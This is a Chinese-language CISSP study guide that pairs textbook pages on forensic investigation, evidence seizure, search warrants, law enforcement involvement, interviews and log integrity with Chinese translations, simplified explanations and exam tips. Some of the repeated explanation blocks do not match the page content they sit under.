考题会把“第 1293 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 15 / PDF P1294

第 1294 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

That traffic had to cross through several security devices. Certainly, the web server was protected by a network firewall. It might also be protected by an intrusion prevention system, a web application firewall, or other controls. Each of those devices may have identified portions of the attack and maintained records helpful to the investigation. Those might be log entries from the successful attack, or perhaps the attacker tried some other things that didn't work that created important log entries. From there, the traffic moved on to the web server hosting the application that was attacked.

That server should have logging configured that captured the actual requests received during the attack, and those requests can be used to reconstruct the commands sent by the attacker through the web server to the database server. The database server may also have relevant information. If logging is enabled on that server, you'll see the commands executed against the database and be able to reconstruct the attacker's actions. Those are a ton of different information sources, and they're all brought to us by thinking through an attack in the context of Locard's exchange principle.

If we think about how an attack took place and remember that every contact leaves a trace, we'll have plenty of different information sources we can use to piece together our investigation. Investigation Process When you initiate a computer security investigation, you should first assemble a team of competent analysts to assist with the investigation. This team should operate under the organization's existing incident response policy and be given a charter that clearly outlines the scope of the investigation; the authority, roles, and responsibilities of the investigators; and any rules of engagement that they must follow while conducting the investigation.

These rules of engagement define and guide the actions that investigators are authorized to take at different phases of the investigation, such as calling in law enforcement, interrogating suspects, collecting evidence, and disrupting system access. Gathering Evidence

中文直译 / 整理

这些流量必须经过多个安全设备。 毫无疑问,Web服务器受到网络防 火墙的保护。 它还可能受到入侵防御系统、Web应用防火墙或其他控 制措施的保护。 这些设备中的每一个都可能识别出攻击的某些部分, 并保留了有助于调查的记录。 这些记录可能是成功攻击的日志条目, 也可能是攻击者尝试了其他无效操作而生成的重要日志条目。 从那里,流量继续流向托管被攻击应用程序的Web服务器。 该服务器 应已配置日志记录,以捕获攻击期间收到的实际请求,这些请求可用 于重建攻击者通过Web服务器发送到数据库服务器的命令。 数据库服务器也可能包含相关信息。 如果该服务器启用了日志记录, 您将看到对数据库执行的命令,并能够重建攻击者的操作。 这些是大量不同的信息来源,而它们都是通过在洛卡德交换原理的背景下 思考攻击过程而获得的。 如果我们思考攻击是如何发生的,并记住每一次 接触都会留下痕迹,我们就能获得大量不同的信息来源,用于拼凑我们的 调查。 调查过程 在启动计算机安全调查时,您应首先组建一支合格的分析师团队以协助调查。

该团队应在组织现有的事件响应政策下运作,并获得一份明确界定调查范围、 调查人员的权限、角色和职责,以及在调查过程中必须遵守的任何行为准则 的章程。 这些行为准则定义并指导调查人员在调查不同阶段被授权采取的行 动,例如联系执法部门、审讯嫌疑人、收集证据和中断系统访问。 收集证据

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1294 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 16 / PDF P1295

第 1295 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

It is common to confiscate equipment, software, or data to perform a proper investigation. The manner in which the evidence is confiscated is important. The confiscation of evidence must be carried out in a proper fashion. There are several possible approaches. First, the person who owns the evidence could voluntarily surrender it or grant consent to a search. This method is generally appropriate only when the attacker is not the owner. Few guilty parties willingly surrender evidence they know will incriminate them. Less experienced attackers may believe they have successfully covered their tracks and voluntarily surrender important evidence.

A good forensic investigator can extract much “covered-up” information from a computer. In most cases, asking for evidence from a suspected attacker just alerts the suspect that you are close to taking legal action. In the case of an internal investigation, you will gather the vast majority of your information through voluntary surrender. Most likely, you're conducting the investigation under the auspices of a senior member of management, who will authorize you to access any organizational resources necessary to complete your investigation.

Second, you could get a court to issue a subpoena, or court order, that compels an individual or organization to surrender evidence, and then have the subpoena served by law enforcement. Again, this course of action provides sufficient notice for someone to alter the evidence and render it useless in court. Third, a law enforcement officer performing a legally permissible duty may seize evidence that is visible to the officer in plain view and where the officer has probable cause to believe that it is associated with criminal activity. This is known as the plain view doctrine. The fourth option is a search warrant.

This option should be used only when you must have access to evidence without tipping off the evidence's owner or other personnel. You must have a strong suspicion with credible reasoning to convince a judge to pursue this course of action. Finally, a law enforcement officer may collect evidence when exigent circumstances exist. This means that a reasonable person would believe that

中文直译 / 整理

为进行适当的调查,通常需要没收设备、软件或数据。 证据没收的方式至关重 要。 证据的没收必须以适当的方式进行。 有几种可能的方法。 首先,证据的拥有者可以自愿交出证据或同意搜查。 这种方法通常仅适用于攻 击者并非所有者的情况。 很少有有罪者会自愿交出他们明知会陷害自己的证据。 经验较少的攻击者可能认为自己已成功掩盖了痕迹,从而自愿交出重要证据。 一名经验丰富的取证调查人员可以从计算机中提取大量被“掩盖”的信息。 在 大多数情况下,向涉嫌攻击者索要证据只会提醒对方你已接近采取法律行动。 在内部调查中,你将通过自愿交出的方式获取绝大多数信息。 很可能, 你是在管理层高级成员的授权下开展调查,该成员将授权你访问完成调查 所需的任何组织资源。 其次,你可以请求法院签发传票或法院命令,强制个人或组织交出证据,然 后由执法部门送达传票。 同样,这种做法会给对方足够的时间篡改证据,使 其在法庭上失去效力。 第三,执法官员在履行合法职责时,可以扣押其目视可见且有合理理由相信与 犯罪活动相关的证据。 这被称为简易视见原则。 第四种选择是搜查令。 只有在必须获取证据而又不能惊动证据所有者或其他人 员时,才应使用此选项。

您必须有充分的怀疑和可信的理由,以说服法官采取 这一行动。 最后,在存在紧急情况时,执法官员可以收集证据。 这意味着一个合理的人会认 为

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1295 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 17 / PDF P1296

第 1296 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the evidence would be destroyed if not immediately collected or that another emergency exists, such as the risk of physical harm. When officers enter a premises under exigent circumstances, they may conduct a warrantless search. These options apply to confiscating equipment both inside and outside an organization, but there is another step you can take to ensure that the confiscation of equipment that belongs to your organization is carried out properly. It is common to have all new employees sign an agreement that provides consent to search and seize any necessary evidence during an investigation. In this manner, consent is provided as a term of the employment agreement.

This makes confiscation much easier and reduces the chances of a loss of evidence while waiting for legal permission to seize it. Make sure your security policy addresses this important topic. When conducting searches in the workplace, an important consideration is whether the employee has a reasonable expectation of privacy. Outside of government workplaces, most jurisdictions have laws or precedents that state that employees do not have an expectation of privacy under most workplace situations. Employers generally have the authority to search electronic systems that they own and operate.

The law gets much more nuanced and complex when searches might violate personal privacy, such as searching an employee's person or belongings. In cases where this may be necessary, always consult an attorney to ensure that the search is done in compliance with all local laws and regulations. Calling in Law Enforcement One of the first decisions that must be made in an investigation is whether law enforcement authorities should be called in. This is a relatively complicated decision that should involve senior management officials. There are many factors in favor of calling in the experts.

For example, the FBI runs a nationwide Cyber Division that serves as a center of excellence for the investigation of cybercrimes. Additionally, local FBI field offices now have agents who are specifically trained to handle cybercrime investigations. These agents investigate federal offenses in their region and may also consult with local law enforcement, upon request. The U.S. Secret Service has similarly skilled staff in their headquarters and field offices. On the other hand, two major factors may cause a company to shy away from calling in the authorities. First, the investigation will more than likely become

中文直译 / 整理

如果不对证据立即收集,证据将被销毁,或者存在其他紧急情况,例如身体伤 害的风险。 当官员在紧急情况下进入场所时,他们可以进行无令状搜查。 这些选项适用于组织内外设备的没收,但您还可以采取另一项措施,以确保贵 组织的设备被妥善没收。 通常,所有新员工都需签署一份协议,同意在调查过 程中搜查并扣押任何必要证据。 这种方式将同意作为雇佣协议的条款。 这使得 没收更加容易,并减少了在等待法律授权扣押期间证据丢失的可能性。 请确保 您的安全政策涵盖这一重要议题。 在工作场所进行搜查时,一个重要的考虑因素是员工是否具有合理的隐私期待。 在政府工作场所之外,大多数司法管辖区都有法律或先例规定,员工在大多数 工作场所情况下不享有隐私期待。 雇主通常有权搜查其拥有和运营的电子系统。 当搜查可能侵犯个人隐私时,例如搜查员工本人或其财物,法律会变得更加复 杂和精细。 在可能需要此类搜查的情况下,请务必咨询律师,以确保搜查符合 所有当地法律法规。 通知执法部门 在调查中必须做出的首个决定之一是是否应通知执法机构。 这是一个相对复杂 的决定,应由高级管理人员参与。 有许多理由支持邀请专家介入。

例如,联邦 调查局(FBI)设有全国性的网络部门,作为网络犯罪调查的卓越中心。 此外, 当地FBI分局现在配备了经过专门培训、专门处理网络犯罪调查的特工。 这些 特工负责调查其辖区内的联邦犯罪,并可根据要求与地方执法部门进行咨询。 美国特勤局在总部和各分局同样拥有技能娴熟的人员。 另一方面,有两个主要因素可能导致公司不愿寻求当局介入。 首先,调查很可能会 公开化,并使公司陷入尴尬。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1296 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
学习单元 18 / PDF P1297

第 1297 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

public and may embarrass the company. Second, law enforcement authorities are bound to conduct an investigation that complies with the Fourth Amendment and other legal requirements that may not apply if the organization conducted its own private investigation.

中文直译 / 整理

其次,执法部门必须开展符合第四修正案及其他法律要求的调查,而这些要求 在组织自行开展内部调查时可能并不适用。

小白解释

场景先行:你是公司的安全负责人,正在读第 1297 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1297 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 19 / PDF P1298

第 1298 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Search Warrants Even the most casual viewer of American crime television is familiar with the question, “Do you have a warrant?” The Fourth Amendment of the U.S. Constitution outlines the burden placed on investigators to have a valid search warrant before conducting certain searches and the legal hurdles they must overcome to obtain a warrant: The right of the people to be secure in their persons, houses, papers and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.

This amendment contains several important provisions that guide the activities of law enforcement personnel: Investigators must obtain a warrant before searching a person's private belongings, assuming that there is a reasonable expectation of privacy. There are a number of documented exceptions to this requirement, such as when an individual consents to a search, the evidence of a crime is in plain view, or there is a life-threatening emergency necessitating the search. Warrants can be issued only based on probable cause. There must be some type of evidence that a crime took place and that the search in question will yield evidence relating to that crime.

The standard of “probable cause” required to get a warrant is much weaker than the standard of evidence required to secure a conviction. Most warrants are “sworn out” based solely on the testimony of investigators. Warrants must be specific in their scope. The warrant must contain a detailed description of the legal bounds of the search and seizure. If investigators fail to comply with even the smallest detail of these provisions, they may find their warrant invalidated and the results of the search deemed inadmissible. This leads to another one of those American colloquialisms: “They got off on a technicality.” Conducting the Investigation

中文直译 / 整理

搜查令 即使是美国犯罪电视剧最随意的观众,也熟悉这个问题:“你们有搜查令 吗? ”美国宪法第四修正案规定了调查人员在进行某些搜查前必须持有有 效搜查令的责任,以及他们为获得搜查令必须克服的法律障碍: 人民的人身、住宅、文件和财产不受无理搜查和扣押的权利,不得侵 犯; 除依据合理根据,经宣誓或郑重声明保证,并具体说明搜查地点 和应扣押的人或物外,不得签发搜查令。 这一修正案包含若干指导执法人员活动的重要规定: 调查人员在搜查个人私人物品前必须获得搜查令,前提是存在合理 的隐私期待。 这一要求有若干已记录的例外情况,例如当个人同意 搜查、犯罪证据处于明显可见状态,或存在危及生命的紧急情况需 要搜查时。 只有在有合理根据的情况下才能签发搜查令。 必须存在某种证据,证 明犯罪确实发生,且所涉及的搜查将获取与该犯罪相关的证据。 获得 搜查令所需的“合理根据”标准,远低于定罪所需的证据标准。 大多 数搜查令仅凭调查人员的证词即可签发。 搜查令必须明确其范围。 搜查令必须详细描述搜查和扣押的法律界限。 如果调查人员未能遵守这些规定的任何最小细节,他们可能会发现其搜查 令被撤销,搜查结果被视为不可采纳。

这引出了另一个美国俚语:"他们因 技术性原因脱罪了。 " 开展调查

小白解释

场景先行:你是公司的安全负责人,正在读第 1298 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1298 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 20 / PDF P1299

第 1299 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

If you elect not to call in law enforcement, you should still attempt to abide by the principles of a sound investigation to ensure the accuracy and fairness of your inquiry. It is important to remember a few key principles: Other than collecting a memory dump or other live forensic techniques, never conduct your investigation on an actual system that was compromised. Take the system offline, make a backup, and use the backup to investigate the incident. Never attempt to “hack back” and avenge a crime. You may inadvertently attack an innocent third party and find yourself liable for computer crime charges. If in doubt, call in expert assistance.

If you don't want to call in law enforcement, contact a private investigations firm with specific experience in the field of computer security investigations. Interviewing Individuals During the course of an investigation, you may find it necessary to speak with individuals who might have information relevant to your investigation. If you seek only to gather information to assist with your investigation, this is called an interview. If you suspect the person of involvement in a crime and intend to use the information gathered in court, this is called an interrogation.

Before conducting an interview or interrogation, the interviewer should carefully plan the topics to be discussed with the subject. It is helpful to begin with a standard checklist of topics/questions and then customize that list based on the unique circumstances of the interview. This helps ensure that all topics are addressed and that interviews of different subjects are conducted consistently. Of course, the interviewer must use their own skill and discretion to conduct the interview in an appropriate manner, which may involve deviating from the checklist based on the behavior of the subject, information uncovered during the interview, and other circumstances.

Interviewing and interrogating individuals are specialized skills and should be performed only by trained investigators. Improper techniques may jeopardize the ability of law enforcement to successfully prosecute an offender. Additionally, many laws govern holding or detaining individuals, and you must abide by them if you plan to conduct private interrogations. Always consult an attorney before conducting any interviews.

中文直译 / 整理

如果您选择不通知执法部门,仍应尽量遵循严谨调查的原则,以确保您调查的 准确性和公正性。 请记住以下几点关键原则: 除了收集内存转储或其他实时取证技术外,绝不要在实际受到入侵的系统上进行 调查 应将系统离线,制作备份,并使用备份来调查该事件。 绝不要尝试“反黑客”以报复犯罪。 您可能无意中攻击了无辜的第三方, 并因此承担计算机犯罪的法律责任。 如有疑虑,请寻求专家协助。 如果您不想联系执法部门,请联系一家在计算 机安全调查领域具有特定 经验的私人调查公司。 访谈人员 在调查过程中,您可能需要与可能掌握与您调查相关信息的人员交谈。 如果您 仅旨在收集信息以协助调查,这称为访谈。 如果您怀疑该人员涉及犯罪,并打 算将所收集的信息用于法庭,这称为讯问。 在进行访谈或讯问之前,访谈者应仔细规划将与被访者讨论的主题。 从一份标 准的主题/问题清单开始,然后根据访谈的独特情况对该清单进行定制,这有助 于确保所有主题都得到涵盖,并使不同被访者的访谈保持一致。 当然,访谈者 必须运用自身的技能和判断力,以适当的方式进行访谈,这可能涉及根据被访 者的行为、访谈中发现的信息以及其他情况偏离清单。

面谈和讯问个人是专业技能,只能由受过训练的调查人员执行。 不当的技术可 能损害执法部门成功起诉违法者的的能力。 此外,许多法律规范了对个人的拘 禁或拘留,如果您计划进行私人讯问,必须遵守这些法律。 在进行任何面谈之 前,请务必咨询律师。

小白解释

场景先行:你是公司的安全负责人,正在读第 1299 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1299 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 21 / PDF P1300

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Data Integrity and Retention No matter how persuasive evidence may be, it can be thrown out of court if you somehow alter it during the evidence collection process. Make sure you can prove that you maintained the integrity of all evidence. But what about the integrity of data before it is collected? You may not detect all incidents as they are happening. Sometimes an investigation reveals that there were previous incidents that went undetected. It is discouraging to follow a trail of evidence and find that a key log file that could point back to an attacker has been purged. Carefully consider the fate of log files or other possible evidence locations.

A simple archiving policy can help ensure that key evidence is available upon demand no matter how long ago the incident occurred. Because many log files can contain valuable evidence, attackers often attempt to sanitize them after a successful attack. Take steps to protect the integrity of log files and to deter their modification. One technique is to implement remote logging, where all systems on the network send their log records to a centralized log server that is locked down against attack and does not allow for the modification of data. This technique provides protection from postincident log file cleansing.

Administrators also often use digital signatures to prove that log files were not tampered with after initial capture. For more on digital signatures, see Chapter 7, “PKI and Cryptographic Applications.” As with every aspect of security planning, there is no single solution. Get familiar with your system, and take the steps that make the most sense for your organization to protect it. Reporting and Documenting Investigations Every investigation you conduct should result in a final report that documents the goals of the investigation, the procedures followed, the evidence collected, and the final results of the investigation.

The degree of formality behind this report will vary based on the organization's policy and procedures, as well as the nature of the investigation. Preparing formal documentation is important because it lays the foundation for escalation and potential legal action. You may not know when an investigation begins (or even after it concludes) that it will be the subject of legal action, but you should prepare for that eventuality. Even internal investigations into administrative matters may become part of an

中文直译 / 整理

数据完整性与保留 无论证据多么有说服力,如果在证据收集过程中您以任何方式更改了它,证 据都可能被法庭排除。 请确保您能够证明您维护了所有证据的完整性。 但证 据收集之前的数据显示完整性如何呢? 您可能无法在事件发生时立即发现所有事件。 有时调查会揭示出此前未被发现 的事件。 当您追踪证据线索时,发现本可指向攻击者的关键日志文件已被清除, 这令人沮丧。 请仔细考虑日志文件或其他可能的证据位置的处理方式。 一个简 单的归档策略可以帮助确保关键证据在需要时始终可用,无论事件发生在多久 以前。 由于许多日志文件可能包含宝贵证据,攻击者通常在成功攻击后尝试清理它们。 请采取措施保护日志文件的完整性并防止其被修改。 一种技术是实施远程日志 记录,即网络上的所有系统将其日志记录发送到一个经过安全加固、不允许修 改数据的集中式日志服务器。 这种技术可防止事件发生后的日志文件清理。 管 理员还常使用数字签名来证明日志文件在初始捕获后未被篡改。 有关数字签名 的更多信息,请参见第7章,“PKI与加密应用。 ” 与安全规划的每个方面一样,没有单一的解决方案。 请熟悉您的系统,并采 取最适合您组织的措施来保护它。

调查报告与记录 您进行的每一项调查都应生成一份最终报告,记录调查的目标、所遵循的程 序、收集的证据以及调查的最终结果。 该报告的正式程度将根据组织的政策 和程序以及调查的性质而有所不同。 准备正式文件非常重要,因为它为升级和潜在的法律行动奠定了基础。 您可能 无法预知调查何时开始(甚至在调查结束后),它将成为法律行动的对象,但 您应为此种可能性做好准备。 即使是针对行政事务的内部调查,也可能成为

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
保留期限 保留期限规定数据、日志或记录要保存多久。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
学习单元 22 / PDF P1301

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

employment dispute or other legal action. The use of standard procedures and checklists for the collection and documentation of evidence helps ensure that evidence is collected in a manner that will be admissible down the road. Organizations should also ensure that anyone involved in the collection or analysis of potential evidence receives proper training. It's a good idea to establish a relationship with your corporate legal personnel and the appropriate law enforcement agencies. Find out who the appropriate law enforcement contacts are for your organization and talk with them.

When the time comes to report an incident, your efforts at establishing a prior working relationship will pay off. You will spend far less time in introductions and explanations if you already know the person with whom you are talking. It is a good idea to identify, in advance, a single point of contact in your organization who will act as your liaison with law enforcement. This provides two benefits. First, it ensures that law enforcement hears a single perspective from your organization and knows the “go-to” person for updates. Second, it allows the predesignated contact to develop working relationships with law enforcement personnel.

One great way to establish technical contacts with law enforcement is to participate in the FBI's InfraGard program. InfraGard exists in most major metropolitan areas in the United States and provides a forum for law enforcement and business security professionals to share information in a closed environment. For more information, visit www.infragard.org. Major Categories of Computer Crime There are many ways to attack a computer system and many motivations to do so. Information system security practitioners generally put crimes against or involving computers into different categories. Simply put, a computer crime is a crime (or violation of a law or regulation) that involves a computer.

The crime could be against the computer, or the computer could have been used in the actual commission of the crime. Each of the categories of computer crimes represents the purpose of an attack and its intended result.

中文直译 / 整理

雇佣纠纷或其他法律行动的一部分。 使用标准化程序和检查清单来收集和记录 证据,有助于确保证据以未来可被采纳的方式收集。 组织还应确保任何参与潜 在证据收集或分析的人员都接受适当培训。 与公司法律人员及相应的执法机构建立关系是一个好主意。 了解您组织对应的 执法联系人,并与他们进行沟通。 当需要报告事件时,您之前建立的协作关系 将带来回报。 如果您已经熟悉与您交谈的人,您将大大减少介绍和解释的时间。 建议提前在您组织中指定一名联络人,负责与执法机构对接。 这带来两方面的 好处:首先,它确保执法机构从您的组织获得统一的视角,并知道谁是更新信 息的联络人; 其次,它使预先指定的联络人能够与执法工作人员建立协作关系。 与执法机构建立技术联系的一个绝佳方式是参与联邦调查局的 InfraGard项目。 InfraGard项目在美国大多数主要都市区均有设立,为执 法机构与企业安全专业人员提供了一个封闭的信息共享平台。 如需更多信 息,请访问www.infragard.org。 计算机犯罪的主要类别 攻击计算机系统的方式多种多样,动机也各不相同。 信息系统安全从业人员通 常将涉及或针对计算机的犯罪划分为不同类别。

